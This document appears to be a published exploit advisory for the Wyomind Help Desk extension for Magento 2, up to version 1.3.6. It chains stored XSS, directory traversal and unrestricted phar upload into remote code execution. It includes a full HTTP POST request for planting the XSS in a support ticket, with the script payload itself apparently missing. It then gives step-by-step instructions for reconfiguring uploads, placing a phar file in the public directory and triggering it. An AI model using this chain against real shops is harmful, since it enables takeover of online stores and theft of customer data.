# Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) # Date: 2021-07-07 # Exploit Author: Patrik Lantz # Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html # Version: <= 1.3.6 # Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2 The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution. A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable the delivery of the XSS payload: POST /helpdesk/customer/ticket_save/ HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635 Content-Length: 683 Origin: https:// Connection: close Referer: https:///helpdesk/customer/ticket_view/ Cookie: Upgrade-Insecure-Requests: 1 -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="form_key" -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="object" Hello -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="message_cc" -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="content"

-----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="hideit" -----------------------------243970849510445067673127196635-- The following XSS payload shown below can be used to trigger 1) Enabling file attachments in ticket messages 2) Adding 'phar' to allowed file extensions 3) Setting the attachment directory to 'helpdesk/files/../../../pub' After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting https://[HOSTNAME]///filename.phar ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the URL, for example: https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/ and the messageId can be identified by hovering over the uploaded file link which will be similar to https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar in this case, the messageId is 40.